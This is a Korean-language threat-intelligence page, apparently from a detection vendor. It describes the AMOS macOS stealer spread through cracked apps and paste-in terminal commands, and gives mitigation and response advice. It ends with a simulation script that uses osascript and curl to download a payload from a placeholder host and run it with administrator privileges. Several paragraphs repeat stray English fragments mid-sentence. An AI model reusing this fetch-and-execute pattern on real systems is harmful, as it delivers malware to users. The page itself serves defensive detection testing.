SOC Prime Bias: 중간

08 May 2026 15:45 UTC

AMOS 스틸러, “크랙”된 앱을 통해 macOS 타겟팅

Author Photo
SOC Prime Team linkedin icon 팔로우
AMOS 스틸러, “크랙”된 앱을 통해 macOS 타겟팅
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

이 보고서는 크랙된 애플리케이션으로 위장하거나 사용자가 복사-붙여넣기 방식의 터미널 명령을 실행하도록 지시하여 Atomic macOS Stealer (AMOS)를 배포하는 캠페인에 대해 설명합니다. 실행되면, 이 악성코드는 자격 증명, 브라우저 정보, 암호화폐 지갑, 메시징 애플리케이션 파일, VPN 프로필, 개인 문서를 포함한 광범위한 민감한 데이터를 수집한 후 HTTP 또는 HTTPS를 통해 탈취된 내용을 유출합니다. 운영자는 정적 탐지를 피하기 위해 캠페인이 진행되는 동안 도메인과 URL을 회전시킵니다. 이 활동은 주로 비공식 또는 불법 소프트웨어를 찾는 macOS 사용자들을 목표로 합니다.

조사

Trend Vision One 원격 측정이 haxmac.cc 에서의 크랙 애플리케이션 다운로드를 시작으로 인터미디에이트 도메인을 통한 리디렉션, 악성 셸 스크립트 실행, 지속성을 위한 런치 데몬 생성, 데이터 staging을 /tmp 에서 수행 후 ZIP 압축하여 공격자가 제어하는 회전 도메인으로 유출하는 전체 감염 체인을 재구성하는 데 사용되었습니다. 연구원들은 각 침해 단계와 관련된 명령 줄, 파일 경로, 행동 지표를 캡처했습니다. haxmac.cc, followed by redirection through intermediary domains, execution of malicious shell scripts, creation of launch daemons for persistence, staging of data in /tmp, compression into ZIP archives, and exfiltration to rotating attacker-controlled domains. Researchers captured the relevant command lines, file paths, and behavioral indicators associated with each stage of the compromise.

완화

조직은 사용자에게 크랙 소프트웨어와 복사-붙여넣기 터미널 명령의 위험에 대해 교육하고, Gatekeeper 및 공증 제어를 시행하며, macOS 시스템에서 불필요한 스크립트 실행을 제한해야 합니다. 방어자는 의심하는 curl및 osascript 활동을 모니터링하고, 알려진 악성 도메인 및 IP 주소에 대한 접근을 차단해야 합니다. 엔드포인트 탐지는 승인되지 않은 런치 데몬 생성, 숨겨진 파일 배치, 비정상적인 파일 수집 또는 유출 행동에 중점을 두어야 합니다. curl and osascript activity and block access to known malicious domains and IP addresses. Endpoint detections should focus on unauthorized launch daemon creation, hidden file placement, and unusual file collection or exfiltration behavior.

대응

AMOS 활동이 탐지되면, 영향을 받은 엔드포인트를 격리하고, 악성 프로세스를 종료하며, .helper 및 .agent와 같은 숨겨진 파일들을 제거하고, com.finder.helper.plist 등으로 준비된 모든 staging 데이터를 삭제하십시오. 손상된 자격 증명은 철회해야 하며, 복구된 아카이브에 대한 포렌식 분석을 수행해야 합니다. 식별된 악성 인프라는 차단해야 하며, 관찰된 명령 패턴을 감시할 수 있도록 탐지 내용을 업데이트해야 합니다. .helper, .agent, and com.finder.helper.plist, and delete any staged data prepared for exfiltration. Compromised credentials should be revoked, and forensic analysis should be performed on any recovered archives. The identified malicious infrastructure should be blocked, and detection content should be updated to monitor for the observed command patterns.

공격 흐름

시뮬레이션 실행

전제 조건: 원격 측정 및 기준선 사전 점검이 통과해야 합니다.

추론: 이 섹션에서는 탐지 규칙을 유발하도록 설계된 적의 기법 (TTP)의 정확한 실행을 자세히 설명합니다. 명령 및 서사는 식별된 TTP를 직접 반영하고, 탐지 논리에 의해 기대되는 정확한 원격 측정을 생성하는 것을 목표로 해야 합니다. 추상적이거나 관련이 없는 예시는 오진을 유발할 수 있습니다.

  • 공격 서사 및 명령:
    적은 AppleScript 페이로드를 전달하는 피싱 미끼를 얻었습니다. 이 스크립트는 osascript 를 사용하여 셸 명령 (sh -c )을 실행하며, 이는 curl 을 호출하여 악성 C2 서버에서 AMOS 스틸러 바이너리를 다운로드하고 사용자 의 ~/Library/Application Support/ 폴더에 저장한 뒤에 권한 상승으로 실행합니다. osascript 의 사용 (서명된 Apple 바이너리)이 정당한 자동화처럼 보이고, curl 은 은밀한 네트워크 다운로드 제공을 합니다. osascript to execute a shell command (sh -c) that invokes curl to download the AMOS stealer binary from a malicious C2 server, stores it in the user’s ~/Library/Application Support/ folder, and then executes it with elevated permissions. The use of osascript (a signed Apple binary) masks the activity as legitimate automation, while curl provides a stealthy network download.

  • 회귀 테스트 스크립트:

    # amos_stealer_simulation.sh
    # osascript + curl 을 사용하여 macOS에서 AMOS 스틸러 실행을 시뮬레이션합니다.
    
    # 1. 악성 URL 정의 (안전성을 위해 무해한 플레이스홀더 사용)
    MALICIOUS_URL="https://example.com/malicious_payload.sh"
    
    # 2. AppleScript는 셸 명령을 실행하여 페이로드를 다운로드하고 실행합니다
    APPLESCRIPT=$(cat <<'EOF'
    do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges
    EOF
    )
    
    # 3. osascript로 AppleScript 실행
    echo "$APPLESCRIPT" | osascript
    
    # 4. 페이로드 실행 잠시 대기
    sleep 5
  • 정리 명령:

    # cleanup_amos_simulation.sh
    # 시뮬레이션에서 생성된 아티팩트 제거
    
    # 다운로드된 페이로드 제거
    rm -f /tmp/payload.sh
    
    # 임시로 상승된 프로세스 철회 (여전히 실행중인 경우)
    pkill -f "/tmp/payload.sh" || true
    
    # 선택적으로, AppleScript 실행 기록 지우기
    # (macOS는 osascript에 대해 지속적인 기록을 보관하지 않습니다)
    echo "정리 완료."